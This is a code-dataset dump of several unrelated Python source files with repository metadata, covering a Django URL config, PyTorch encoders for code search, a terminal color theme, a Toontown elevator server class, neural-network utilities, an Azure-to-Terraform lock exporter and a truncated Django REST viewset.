hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0db1cd3c88ec4830d65c1a63306bb321b9c06515 | 250 | py | Python | custom/ucla/urls.py | dslowikowski/commcare-hq | ad8885cf8dab69dc85cb64f37aeaf06106124797 | [
"BSD-3-Clause"
] | 1 | 2015-02-10T23:26:39.000Z | 2015-02-10T23:26:39.000Z | custom/ucla/urls.py | SEL-Columbia/commcare-hq | 992ee34a679c37f063f86200e6df5a197d5e3ff6 | [
"BSD-3-Clause"
] | 1 | 2022-03-12T01:03:25.000Z | 2022-03-12T01:03:25.000Z | custom/ucla/urls.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls import patterns, url
urlpatterns = patterns('custom.ucla.views',
url(r'ucla-task-creation/(?P<app_id>[\w-]+)/modules-(?P<module_id>[\w-]+)/forms-(?P<form_id>[\w-]+)/$',
'task_creation', name='ucla_task_creation')
)
| 35.714286 | 107 | 0.656 |
c8752abbebbdc152e3f7b13495ec5f72c74556b7 | 6,172 | py | Python | src/code_query/model/encoder.py | frans-johansson/code-query | 977e98100e1bf3b30246eee5eaa722885f2c0d41 | [
"MIT"
] | null | null | null | src/code_query/model/encoder.py | frans-johansson/code-query | 977e98100e1bf3b30246eee5eaa722885f2c0d41 | [
"MIT"
] | null | null | null | src/code_query/model/encoder.py | frans-johansson/code-query | 977e98100e1bf3b30246eee5eaa722885f2c0d41 | [
"MIT"
] | null | null | null | """
Contains various encoders for code and queries which the CodeQuery model utilizes.
"""
from abc import ABC, abstractstaticmethod
from argparse import ArgumentParser, Namespace
from enum import Enum
from typing import Any, Dict, Union
import torch
from torch import nn
import pytorch_lightning as pl
from transformers import AutoModel, AutoConfig
from code_query.config import MODELS, TRAINING
class Encoder(ABC):
"""
Base class for encoders. Can also be used to obtain relevant
classes from a string argument via the internal `Types` enum.
This class demands that all derived classes implement their own
static method for argument parsing in order to provide a coherent
training script API.
"""
class Types(Enum):
NBOW = "nbow"
BERT = "bert"
ROBERTA = "roberta"
CODEBERT = "codebert"
DISTILBERT = "distilbert"
@staticmethod
def get_type(encoder_type: Types):
"""
Returns a class type corresponding to the given type string or enum
"""
if encoder_type == Encoder.Types.NBOW:
return NbowEncoder
else:
return BertLikeEncoder
@abstractstaticmethod
def add_argparse_args(parent_parser: ArgumentParser) -> ArgumentParser:
"""
Should define all arguments requried to initialize the derived encoder
class in its own parser group on the parent parser, and return the parent parser
"""
return parent_parser
class NbowEncoder(pl.LightningModule, Encoder):
"""
Neural bag-of-words encoder
"""
@staticmethod
def add_argparse_args(parent_parser: ArgumentParser) -> ArgumentParser:
"""
Add encoder specific arguments to a parent `ArgumentParser`
"""
parser = parent_parser.add_argument_group("NbowEncoder")
parser.add_argument("--embedding_dim", type=int, default=128)
parser.add_argument("--encoding_dim", type=int, default=128)
parser.add_argument("--encoder_dropout", type=float, default=0.1)
return parent_parser
def __init__(self, hparams: Union[Dict[str, Any], Namespace]) -> None:
"""
Sets up an NBOW encoder for code and queries
Hyperparameters:
embedding_dim (int): Size of the embedding dimensions.
Defaults to 128.
encoding_dim (int): Size of the hidden dimensions for each sequence.
Defaults to 128.
encoder_dropout (float): Dropout rate. Defaults to 0.1.
"""
super().__init__()
self.save_hyperparameters(hparams)
self.embed = nn.Embedding(
num_embeddings=TRAINING.VOCABULARY.SIZE,
embedding_dim=self.hparams.embedding_dim,
padding_idx=0,
scale_grad_by_freq=True
)
self.fc = nn.Linear(
in_features=self.hparams.embedding_dim,
out_features=self.hparams.encoding_dim
)
self.bn = nn.BatchNorm1d(self.hparams.encoding_dim)
self.drop = nn.Dropout(p=self.hparams.encoder_dropout)
def forward(self, X: torch.Tensor) -> torch.Tensor:
"""
Runs a forward pass through the encoder, producing a latent representation of the input
Args:
X (Tensor): A tensor of shape (B, L) representing the input sequence
where B is the batch size and L is the sequence length of each sample
Returns: A tensor of shape (B, H) of latent representations, where H is set by the
`encoding_dim` hyperparameter
"""
embeddings = self.embed(X) # (batch, seq, embedding)
nbow = torch.mean(embeddings, dim=1) # (batch, embedding)
hidden = self.fc(nbow)
hidden = self.bn(hidden)
hidden = torch.tanh(hidden)
hidden = self.drop(hidden)
return hidden
class BertLikeEncoder(pl.LightningModule, Encoder):
"""
An encoder using a BERT-like embedding model
"""
@staticmethod
def add_argparse_args(parent_parser: ArgumentParser) -> ArgumentParser:
"""
Add encoder specific arguments to a parent `ArgumentParser`
"""
parser = parent_parser.add_argument_group("NbowEncoder")
parser.add_argument("--encoding_dim", type=int, default=128)
parser.add_argument("--encoder_dropout", type=float, default=0.1)
return parent_parser
def __init__(self, hparams: Union[Dict[str, Any], Namespace]) -> None:
"""
Sets up a BERT-like encoder for code and queries
Hyperparameters:
encoder_type (Encoder.Types): A string specifying the BERT variant to use.
encoding_dim (int): Size of the hidden dimensions for each sequence.
Defaults to 128.
encoder_dropout (float): Dropout rate. Defaults to 0.1.
"""
super().__init__()
self.save_hyperparameters(hparams)
model_name = MODELS[self.hparams.encoder_type.value.upper()]
self.embed = AutoModel.from_pretrained(model_name)
self.fc = nn.Linear(
in_features=AutoConfig.from_pretrained(model_name).hidden_size,
out_features=self.hparams.encoding_dim
)
self.bn = nn.BatchNorm1d(self.hparams.encoding_dim)
self.drop = nn.Dropout(p=self.hparams.encoder_dropout)
def forward(self, X: torch.Tensor) -> torch.Tensor:
"""
Runs a forward pass through the encoder, producing a latent representation of the input
Args:
X (Tensor): A tensor of shape (B, 1, L) representing the input sequence
where B is the batch size and L is the sequence length of each sample
Returns: A tensor of shape (B, H) of latent representations, where H is set by the
`encoding_dim` hyperparameter
"""
embeddings = self.embed(X.squeeze(1)).last_hidden_state # (batch, seq, embedding)
nbow = torch.mean(embeddings, dim=1) # (batch, embedding)
hidden = self.fc(nbow)
hidden = self.bn(hidden)
hidden = torch.tanh(hidden)
hidden = self.drop(hidden)
return hidden
| 37.406061 | 95 | 0.647278 |
d7fc1fee44c7b279ed857a1a5dafc557a00f54a7 | 2,391 | py | Python | base16/base16-bright.py | memeplex/base16-prompt-toolkit | 8a52f886005eb1fa005fd65a2c4b1a680a1f1d91 | [
"MIT"
] | 12 | 2017-02-27T02:03:20.000Z | 2021-04-12T08:56:46.000Z | base16/base16-bright.py | memeplex/base16-prompt-toolkit | 8a52f886005eb1fa005fd65a2c4b1a680a1f1d91 | [
"MIT"
] | 6 | 2017-02-27T19:09:13.000Z | 2020-12-18T10:47:30.000Z | base16/base16-bright.py | memeplex/base16-prompt-toolkit | 8a52f886005eb1fa005fd65a2c4b1a680a1f1d91 | [
"MIT"
] | 8 | 2018-02-08T12:49:27.000Z | 2021-12-21T12:58:27.000Z | # -*- coding: utf-8 -*-
# base16-prompt-toolkit (https://github.com/memeplex/base16-prompt-toolkit)
# Base16 Prompt Toolkit template by Carlos Pita (carlosjosepita@gmail.com
# Bright scheme by Chris Kempson (http://chriskempson.com)
from prompt_toolkit.terminal.vt100_output import _256_colors
from pygments.style import Style
from pygments.token import (Keyword, Name, Comment, String, Error, Text,
Number, Operator, Literal, Token)
# See http://chriskempson.com/projects/base16/ for a description of the role
# of the different colors in the base16 palette.
base00 = '#000000'
base01 = '#303030'
base02 = '#505050'
base03 = '#b0b0b0'
base04 = '#d0d0d0'
base05 = '#e0e0e0'
base06 = '#f5f5f5'
base07 = '#ffffff'
base08 = '#fb0120'
base09 = '#fc6d24'
base0A = '#fda331'
base0B = '#a1c659'
base0C = '#76c7b7'
base0D = '#6fb3d2'
base0E = '#d381c3'
base0F = '#be643c'
# See https://github.com/jonathanslenders/python-prompt-toolkit/issues/355
colors = (globals()['base0' + d] for d in '08BADEC5379F1246')
for i, color in enumerate(colors):
r, g, b = int(color[1:3], 16), int(color[3:5], 16), int(color[5:], 16)
_256_colors[r, g, b] = i + 6 if i > 8 else i
# See http://pygments.org/docs/tokens/ for a description of the different
# pygments tokens.
class Base16Style(Style):
background_color = base00
highlight_color = base02
default_style = base05
styles = {
Text: base05,
Error: '%s bold' % base08,
Comment: base03,
Keyword: base0E,
Keyword.Constant: base09,
Keyword.Namespace: base0D,
Name.Builtin: base0D,
Name.Function: base0D,
Name.Class: base0D,
Name.Decorator: base0E,
Name.Exception: base08,
Number: base09,
Operator: base0E,
Literal: base0B,
String: base0B
}
# See https://github.com/jonathanslenders/python-prompt-toolkit/blob/master/prompt_toolkit/styles/defaults.py
# for a description of prompt_toolkit related pseudo-tokens.
overrides = {
Token.Prompt: base0B,
Token.PromptNum: '%s bold' % base0B,
Token.OutPrompt: base08,
Token.OutPromptNum: '%s bold' % base08,
Token.Menu.Completions.Completion: 'bg:%s %s' % (base01, base04),
Token.Menu.Completions.Completion.Current: 'bg:%s %s' % (base04, base01),
Token.MatchingBracket.Other: 'bg:%s %s' % (base03, base00)
}
| 30.653846 | 109 | 0.667921 |
c5aff79d3ee7bc7be9b1e8832547de5934e21e2f | 10,266 | py | Python | toontown/building/DistributedElevatorAI.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | 1 | 2020-09-27T22:12:47.000Z | 2020-09-27T22:12:47.000Z | toontown/building/DistributedElevatorAI.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | null | null | null | toontown/building/DistributedElevatorAI.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | 2 | 2020-09-26T20:37:18.000Z | 2020-11-15T20:55:33.000Z | from otp.ai.AIBase import *
from toontown.toonbase import ToontownGlobals
from direct.distributed.ClockDelta import *
from .ElevatorConstants import *
from direct.distributed import DistributedObjectAI
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from direct.task import Task
from direct.directnotify import DirectNotifyGlobal
class DistributedElevatorAI(DistributedObjectAI.DistributedObjectAI):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedElevatorAI')
def __init__(self, air, bldg, numSeats = 4, antiShuffle = 0, minLaff = 0):
DistributedObjectAI.DistributedObjectAI.__init__(self, air)
self.type = ELEVATOR_NORMAL
self.countdownTime = ElevatorData[self.type]['countdown']
self.bldg = bldg
self.bldgDoId = bldg.getDoId()
self.seats = []
self.setAntiShuffle(antiShuffle)
self.setMinLaff(minLaff)
if self.antiShuffle:
if not hasattr(simbase.air, 'elevatorTripId'):
simbase.air.elevatorTripId = 1
self.elevatorTripId = simbase.air.elevatorTripId
simbase.air.elevatorTripId += 1
else:
self.elevatorTripId = 0
for seat in range(numSeats):
self.seats.append(None)
self.accepting = 0
self.fsm = ClassicFSM.ClassicFSM('DistributedElevatorAI', [State.State('off', self.enterOff, self.exitOff, ['opening', 'closed']),
State.State('opening', self.enterOpening, self.exitOpening, ['waitEmpty', 'waitCountdown']),
State.State('waitEmpty', self.enterWaitEmpty, self.exitWaitEmpty, ['waitCountdown']),
State.State('waitCountdown', self.enterWaitCountdown, self.exitWaitCountdown, ['waitEmpty', 'allAboard']),
State.State('allAboard', self.enterAllAboard, self.exitAllAboard, ['closing', 'waitEmpty', 'waitCountdown']),
State.State('closing', self.enterClosing, self.exitClosing, ['closed', 'waitEmpty']),
State.State('closed', self.enterClosed, self.exitClosed, ['opening'])], 'off', 'off')
self.fsm.enterInitialState()
self.boardingParty = None
return
def delete(self):
self.fsm.requestFinalState()
del self.fsm
del self.bldg
self.ignoreAll()
DistributedObjectAI.DistributedObjectAI.delete(self)
def setBoardingParty(self, party):
self.boardingParty = party
def generate(self):
self.start()
DistributedObjectAI.DistributedObjectAI.generate(self)
def getBldgDoId(self):
return self.bldgDoId
def findAvailableSeat(self):
for i in range(len(self.seats)):
if self.seats[i] == None:
return i
def findAvatar(self, avId):
for i in range(len(self.seats)):
if self.seats[i] == avId:
return i
def countFullSeats(self):
avCounter = 0
for i in self.seats:
if i:
avCounter += 1
return avCounter
def countOpenSeats(self):
openSeats = 0
for i in range(len(self.seats)):
if self.seats[i] is None:
openSeats += 1
return openSeats
def rejectingBoardersHandler(self, avId, reason = 0, wantBoardingShow = 0):
self.rejectBoarder(avId, reason)
def rejectBoarder(self, avId, reason = 0):
self.sendUpdateToAvatarId(avId, 'rejectBoard', [avId, reason])
def acceptingBoardersHandler(self, avId, reason = 0, wantBoardingShow = 0):
self.notify.debug('acceptingBoardersHandler')
seatIndex = self.findAvailableSeat()
if seatIndex == None:
self.rejectBoarder(avId, REJECT_NOSEAT)
else:
self.acceptBoarder(avId, seatIndex, wantBoardingShow)
return
def acceptBoarder(self, avId, seatIndex, wantBoardingShow = 0):
self.notify.debug('acceptBoarder')
if self.findAvatar(avId) != None:
return
self.seats[seatIndex] = avId
self.timeOfBoarding = globalClock.getRealTime()
if wantBoardingShow:
self.timeOfGroupBoarding = globalClock.getRealTime()
self.sendUpdate('fillSlot' + str(seatIndex), [avId, wantBoardingShow])
if self.fsm.getCurrentState().getName() == 'waitEmpty':
self.fsm.request('waitCountdown')
elif self.fsm.getCurrentState().getName() == 'waitCountdown' and self.findAvailableSeat() is None:
self.fsm.request('allAboard')
return
def rejectingExitersHandler(self, avId):
self.rejectExiter(avId)
def rejectExiter(self, avId):
pass
def acceptingExitersHandler(self, avId):
self.acceptExiter(avId)
def clearEmptyNow(self, seatIndex):
self.sendUpdate('emptySlot' + str(seatIndex), [0,
0,
globalClockDelta.getRealNetworkTime(),
0])
def clearFullNow(self, seatIndex):
avId = self.seats[seatIndex]
if avId == None:
self.notify.warning('Clearing an empty seat index: ' + str(seatIndex) + ' ... Strange...')
else:
self.seats[seatIndex] = None
self.sendUpdate('fillSlot' + str(seatIndex), [0, 0])
self.ignore(self.air.getAvatarExitEvent(avId))
return
def d_setState(self, state):
self.sendUpdate('setState', [state, globalClockDelta.getRealNetworkTime()])
def getState(self):
return self.fsm.getCurrentState().getName()
def avIsOKToBoard(self, av):
return av.hp > self.minLaff and self.accepting
def checkBoard(self, av):
if av.hp < self.minLaff:
return REJECT_MINLAFF
return 0
def requestBoard(self, *args):
self.notify.debug('requestBoard')
avId = self.air.getAvatarIdFromSender()
if self.findAvatar(avId) != None:
self.notify.warning('Ignoring multiple requests from %s to board.' % avId)
return
av = self.air.doId2do.get(avId)
if av:
boardResponse = self.checkBoard(av)
newArgs = (avId,) + args + (boardResponse,)
if self.boardingParty and self.boardingParty.hasActiveGroup(avId) and self.boardingParty.getGroupLeader(avId) != avId:
self.notify.warning('Rejecting %s from boarding the elevator because he is already part of a Boarding Group.' % avId)
self.rejectingBoardersHandler(*newArgs)
return
if boardResponse == 0:
self.acceptingBoardersHandler(*newArgs)
else:
self.rejectingBoardersHandler(*newArgs)
else:
self.notify.warning('avid: %s does not exist, but tried to board an elevator' % avId)
return
def partyAvatarBoard(self, avatar, wantBoardingShow = 0):
av = avatar
avId = avatar.doId
if self.findAvatar(avId) != None:
self.notify.warning('Ignoring multiple requests from %s to board.' % avId)
return
if av:
boardResponse = self.checkBoard(av)
newArgs = (avId,) + (boardResponse,) + (wantBoardingShow,)
if boardResponse == 0:
self.acceptingBoardersHandler(*newArgs)
else:
self.rejectingBoardersHandler(*newArgs)
else:
self.notify.warning('avid: %s does not exist, but tried to board an elevator' % avId)
return
def requestExit(self, *args):
self.notify.debug('requestExit')
avId = self.air.getAvatarIdFromSender()
av = self.air.doId2do.get(avId)
if av:
newArgs = (avId,) + args
if self.accepting:
self.acceptingExitersHandler(*newArgs)
else:
self.rejectingExitersHandler(*newArgs)
else:
self.notify.warning('avId: %s does not exist, but tried to exit an elevator' % avId)
def start(self):
self.open()
def enterOff(self):
self.accepting = 0
self.timeOfBoarding = None
self.timeOfGroupBoarding = None
if hasattr(self, 'doId'):
for seatIndex in range(len(self.seats)):
taskMgr.remove(self.uniqueName('clearEmpty-' + str(seatIndex)))
return
def exitOff(self):
self.accepting = 0
def open(self):
self.fsm.request('opening')
def enterOpening(self):
self.d_setState('opening')
self.accepting = 0
for seat in self.seats:
seat = None
def exitOpening(self):
self.accepting = 0
taskMgr.remove(self.uniqueName('opening-timer'))
def enterWaitCountdown(self):
self.d_setState('waitCountdown')
self.accepting = 1
def exitWaitCountdown(self):
self.accepting = 0
taskMgr.remove(self.uniqueName('countdown-timer'))
self.newTrip()
def enterAllAboard(self):
self.accepting = 0
def exitAllAboard(self):
self.accepting = 0
taskMgr.remove(self.uniqueName('waitForAllAboard'))
def enterClosing(self):
self.d_setState('closing')
self.accepting = 0
def exitClosing(self):
self.accepting = 0
taskMgr.remove(self.uniqueName('closing-timer'))
def enterClosed(self):
self.d_setState('closed')
def exitClosed(self):
pass
def enterWaitEmpty(self):
self.d_setState('waitEmpty')
self.accepting = 1
def exitWaitEmpty(self):
self.accepting = 0
def setElevatorTripId(self, id):
self.elevatorTripId = id
def getElevatorTripId(self):
return self.elevatorTripId
def newTrip(self):
if self.antiShuffle:
self.elevatorTripId = simbase.air.elevatorTripId
if simbase.air.elevatorTripId > 2100000000:
simbase.air.elevatorTripId = 1
simbase.air.elevatorTripId += 1
self.sendUpdate('setElevatorTripId', [self.elevatorTripId])
def setAntiShuffle(self, antiShuffle):
self.antiShuffle = antiShuffle
def getAntiShuffle(self):
return self.antiShuffle
def setMinLaff(self, minLaff):
self.minLaff = minLaff
def getMinLaff(self):
return self.minLaff
| 34.449664 | 138 | 0.624002 |
8160273d132ac649ac75c6c975152f7536c3ac13 | 6,810 | py | Python | xnas/spaces/OFA/utils.py | zhengxiawu/XNAS | ea8f8ab31f67155482f5b9a9ad2a0b54c45f45d1 | [
"MIT"
] | 22 | 2020-07-01T02:12:01.000Z | 2020-09-24T05:32:08.000Z | xnas/spaces/OFA/utils.py | zhengxiawu/XNAS | ea8f8ab31f67155482f5b9a9ad2a0b54c45f45d1 | [
"MIT"
] | null | null | null | xnas/spaces/OFA/utils.py | zhengxiawu/XNAS | ea8f8ab31f67155482f5b9a9ad2a0b54c45f45d1 | [
"MIT"
] | 5 | 2020-07-09T06:53:18.000Z | 2020-08-15T13:15:14.000Z | """Utilities."""
import copy
import math
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from xnas.logger.meter import AverageMeter
def list_sum(x):
return x[0] if len(x) == 1 else x[0] + list_sum(x[1:])
def list_mean(x):
return list_sum(x) / len(x)
def min_divisible_value(n1, v1):
"""make sure v1 is divisible by n1, otherwise decrease v1"""
if v1 >= n1:
return n1
while n1 % v1 != 0:
v1 -= 1
return v1
def val2list(val, repeat_time=1):
if isinstance(val, list) or isinstance(val, np.ndarray):
return val
elif isinstance(val, tuple):
return list(val)
else:
return [val for _ in range(repeat_time)]
""" Layer releated"""
def get_same_padding(kernel_size):
if isinstance(kernel_size, tuple):
assert len(kernel_size) == 2, "invalid kernel size: %s" % kernel_size
p1 = get_same_padding(kernel_size[0])
p2 = get_same_padding(kernel_size[1])
return p1, p2
assert isinstance(kernel_size, int), "kernel size should be either `int` or `tuple`"
assert kernel_size % 2 > 0, "kernel size should be odd number"
return kernel_size // 2
def make_divisible(v, divisor=8, min_val=None):
"""
This function is taken from the original tf repo.
It ensures that all layers have a channel number that is divisible by 8
It can be seen here:
https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py
:param v:
:param divisor:
:param min_val:
:return:
"""
if min_val is None:
min_val = divisor
new_v = max(min_val, int(v + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_v < 0.9 * v:
new_v += divisor
return new_v
def drop_connect(inputs, p, training):
"""Drop connect.
Args:
input (tensor: BCWH): Input of this structure.
p (float: 0.0~1.0): Probability of drop connection.
training (bool): The running mode.
Returns:
output: Output after drop connection.
"""
assert 0 <= p <= 1, 'p must be in range of [0,1]'
if not training:
return inputs
batch_size = inputs.shape[0]
keep_prob = 1.0 - p
# generate binary_tensor mask according to probability (p for 0, 1-p for 1)
random_tensor = keep_prob
random_tensor += torch.rand([batch_size, 1, 1, 1], dtype=inputs.dtype, device=inputs.device)
binary_tensor = torch.floor(random_tensor)
output = inputs / keep_prob * binary_tensor
return output
""" BN related """
def clean_num_batch_tracked(net):
for m in net.modules():
if isinstance(m, nn.BatchNorm2d) or isinstance(m, nn.BatchNorm1d):
if m.num_batches_tracked is not None:
m.num_batches_tracked.zero_()
def rm_bn_from_net(net):
for m in net.modules():
if isinstance(m, nn.BatchNorm2d) or isinstance(m, nn.BatchNorm1d):
m.forward = lambda x: x
""" network related """
def init_model(net, model_init="he_fout"):
"""
Conv2d,
BatchNorm2d, BatchNorm1d, GroupNorm
Linear,
"""
if isinstance(net, list):
for sub_net in net:
init_model(sub_net, model_init)
return
for m in net.modules():
if isinstance(m, nn.Conv2d):
if model_init == "he_fout":
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2.0 / n))
elif model_init == "he_fin":
n = m.kernel_size[0] * m.kernel_size[1] * m.in_channels
m.weight.data.normal_(0, math.sqrt(2.0 / n))
else:
raise NotImplementedError
if m.bias is not None:
m.bias.data.zero_()
elif type(m) in [nn.BatchNorm2d, nn.BatchNorm1d, nn.GroupNorm]:
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
stdv = 1.0 / math.sqrt(m.weight.size(1))
m.weight.data.uniform_(-stdv, stdv)
if m.bias is not None:
m.bias.data.zero_()
def set_running_statistics(model, data_loader, device):
"""
reset the BN statistics for different models.
"""
# import DynamicBN here is not so elegant though :(
from .dynamic_ops import DynamicBatchNorm2d
bn_mean = {}
bn_var = {}
forward_model = copy.deepcopy(model)
for name, m in forward_model.named_modules():
if isinstance(m, nn.BatchNorm2d):
bn_mean[name] = AverageMeter()
bn_var[name] = AverageMeter()
def new_forward(bn, mean_est, var_est):
def lambda_forward(x):
batch_mean = (
x.mean(0, keepdim=True)
.mean(2, keepdim=True)
.mean(3, keepdim=True)
) # 1, C, 1, 1
batch_var = (x - batch_mean) * (x - batch_mean)
batch_var = (
batch_var.mean(0, keepdim=True)
.mean(2, keepdim=True)
.mean(3, keepdim=True)
)
batch_mean = torch.squeeze(batch_mean)
batch_var = torch.squeeze(batch_var)
mean_est.update(batch_mean.data, x.size(0))
var_est.update(batch_var.data, x.size(0))
# bn forward using calculated mean & var
_feature_dim = batch_mean.size(0)
return F.batch_norm(
x,
batch_mean,
batch_var,
bn.weight[:_feature_dim],
bn.bias[:_feature_dim],
False,
0.0,
bn.eps,
)
return lambda_forward
m.forward = new_forward(m, bn_mean[name], bn_var[name])
if len(bn_mean) == 0:
# skip if there is no batch normalization layers in the network
return
with torch.no_grad():
DynamicBatchNorm2d.SET_RUNNING_STATISTICS = True
for images, labels in data_loader:
images = images.to(device)
forward_model(images)
DynamicBatchNorm2d.SET_RUNNING_STATISTICS = False
for name, m in model.named_modules():
if name in bn_mean and bn_mean[name].count > 0:
feature_dim = bn_mean[name].avg.size(0)
assert isinstance(m, nn.BatchNorm2d)
m.running_mean.data[:feature_dim].copy_(bn_mean[name].avg)
m.running_var.data[:feature_dim].copy_(bn_var[name].avg)
| 31.82243 | 96 | 0.570485 |
c5a0c89f0d4e45233e61404230e9a8413c0fd471 | 4,779 | py | Python | scripts/azurerm_management_lock.py | recetasdevops/py-az2tf | e6932b64ce194f78724fb92078e2e833a44b50c7 | [
"MIT"
] | null | null | null | scripts/azurerm_management_lock.py | recetasdevops/py-az2tf | e6932b64ce194f78724fb92078e2e833a44b50c7 | [
"MIT"
] | null | null | null | scripts/azurerm_management_lock.py | recetasdevops/py-az2tf | e6932b64ce194f78724fb92078e2e833a44b50c7 | [
"MIT"
] | null | null | null | import uuid
def azurerm_management_lock(crf,cde,crg,headers,requests,sub,json,az2tfmess):
# management locks
tfp="azurerm_management_lock"
azr=""
if crf in tfp:
# REST
# # print "REST VNets"
url="https://management.azure.com/subscriptions/" + sub + "/providers/Microsoft.Authorization/locks"
params = {'api-version': '2017-04-01'}
r = requests.get(url, headers=headers, params=params)
azr= r.json()["value"]
tfrmf="002-"+tfp+"-staterm.sh"
tfimf="002-"+tfp+"-stateimp.sh"
tfrm=open(tfrmf, 'a')
tfim=open(tfimf, 'a')
print "# " + tfp,
count=len(azr)
print count
for j in range(0, count):
name=azr[j]["name"]
name=name.encode('utf-8', 'ignore')
#loc=azr[j]["location"]
id=azr[j]["id"]
rg=id.split("/")[4].replace(".","-").lower()
if rg[0].isdigit(): rg="rg_"+rg
rgs=id.split("/")[4]
level=azr[j]["properties"]["level"]
scope1=id.split("/Microsoft.Authorization")[0].rstrip("providers")
scope=scope1.rstrip("/")
sc=len(scope.split("/"))
#print sc
sn=scope.split("/")[sc-1].replace(" ","-").lower()
sn=sn.replace(".","-")
scope=scope.encode('utf-8', 'ignore')
sn=sn.encode('utf-8', 'ignore')
if crg is not None:
if rgs.lower() != crg.lower():
continue # back to for
if cde:
print(json.dumps(azr[j], indent=4, separators=(',', ': ')))
rname=name.replace(".","-")
rname=rname.replace("[","-")
rname=rname.replace("]","-")
rname=rname.replace(" ","_")
try:
rname=rname.encode('utf-8', 'ignore')
except UnicodeDecodeError:
print('Problem with the name of this item: '+name)
print('Please rename this item in the Azure Portal')
rname=str(uuid.uuid4())
rname=rname.encode('utf-8', 'ignore')
try:
prefix=tfp+"."+rg+'__'+rname+'__'+sn
except UnicodeDecodeError:
print('Problem with the scope name: '+scope)
print('Please rename this item in the Azure Portal')
sn=str(uuid.uuid4())
sn=sn.encode('utf-8', 'ignore')
prefix=tfp+"."+rg+'__'+rname+'__'+sn
#prefix=tfp+"."+rg+'__'+rname
rfilename=prefix+".tf"
fr=open(rfilename, 'w')
fr.write('resource ' + tfp + ' "' + rg + '__' + rname + '__'+ sn + '" {\n')
fr.write('\t name = "' + name + '"\n')
fr.write('\t lock_level = "'+ level + '"\n')
try:
notes=azr[j]["properties"]["notes"]
notes=notes.encode('utf-8', 'ignore')
fr.write('\t notes = "'+ notes + '"\n')
except KeyError:
pass
fr.write('\t scope = "'+ scope + '"\n')
# tags block
# tags block
try:
mtags=azr[j]["tags"]
fr.write('tags = { \n')
for key in mtags.keys():
tval=mtags[key]
fr.write(('\t "' + key + '"="' + tval + '"\n').encode('utf-8'))
fr.write('}\n')
except KeyError:
pass
#try:
# mtags=azr[j]["tags"]
#except:
# mtags="{}"
#tcount=len(mtags)-1
#if tcount > 1 :
# fr.write('tags = { \n')
# print tcount
# for key in mtags.keys():
# tval=mtags[key]
# fr.write(('\t "' + key + '"="' + tval + '"\n').encode('utf-8'))
# #print(json.dumps(mtags, indent=4, separators=(',', ': ')))
# fr.write('}\n')
fr.write('}\n')
fr.close() # close .tf file
if cde:
with open(rfilename) as f:
print f.read()
tfrm.write('terraform state rm '+tfp+'.'+rg+'__'+rname + '__' + sn + '\n')
tfcomm='terraform import '+tfp+'.'+rg+'__'+rname + '__'+ sn + ' "'+id+'"\n'
tfim.write('echo "importing ' + str(j) + ' of ' + str(count-1) + '"' + '\n')
tfcomm=tfcomm.encode('utf-8', 'ignore')
tfim.write(tfcomm)
# end for
tfrm.close()
tfim.close()
#end management locks | 35.664179 | 108 | 0.42624 |
64cf437027809e4e6c8fe303d5a60bd2b5af8fb0 | 4,368 | py | Python | saleor/rest/views/payment.py | Chaoslecion123/Diver | 8c5c493701422eada49cbf95b0b0add08f1ea561 | [
"BSD-3-Clause"
] | null | null | null | saleor/rest/views/payment.py | Chaoslecion123/Diver | 8c5c493701422eada49cbf95b0b0add08f1ea561 | [
"BSD-3-Clause"
] | null | null | null | saleor/rest/views/payment.py | Chaoslecion123/Diver | 8c5c493701422eada49cbf95b0b0add08f1ea561 | [
"BSD-3-Clause"
] | null | null | null | from django.apps import apps
from rest_framework.filters import SearchFilter
from rest_framework.filters import OrderingFilter
from django_filters.rest_framework import DjangoFilterBackend
from rest_flex_fields import FlexFieldsModelViewSet
from saleor.rest.serializers import PaymentSerializer
__all__ = [
'PaymentViewSet',
]
Payment = apps.get_model(*'payment.Payment'.split())
class PaymentViewSet(FlexFieldsModelViewSet):
"""ViewSet for :model:`payment.Payment`
`** Actions **`:
create:
Create a new `payment.Payment` instance.
retrieve:
Return the given `payment.Payment`.
update:
Update the given `payment.Payment`..
delete:
Delete the given `payment.Payment`, and return an empty response
with HTTP 204 status code.
list:
Return a list of all the existing :model:`Payment`.
"""
lookup_field = 'id'
queryset = Payment.objects.all()
serializer_class = PaymentSerializer
filter_backends = [DjangoFilterBackend, SearchFilter, OrderingFilter, ]
filter_fields = [
# Fields
# 'billing_address_1',
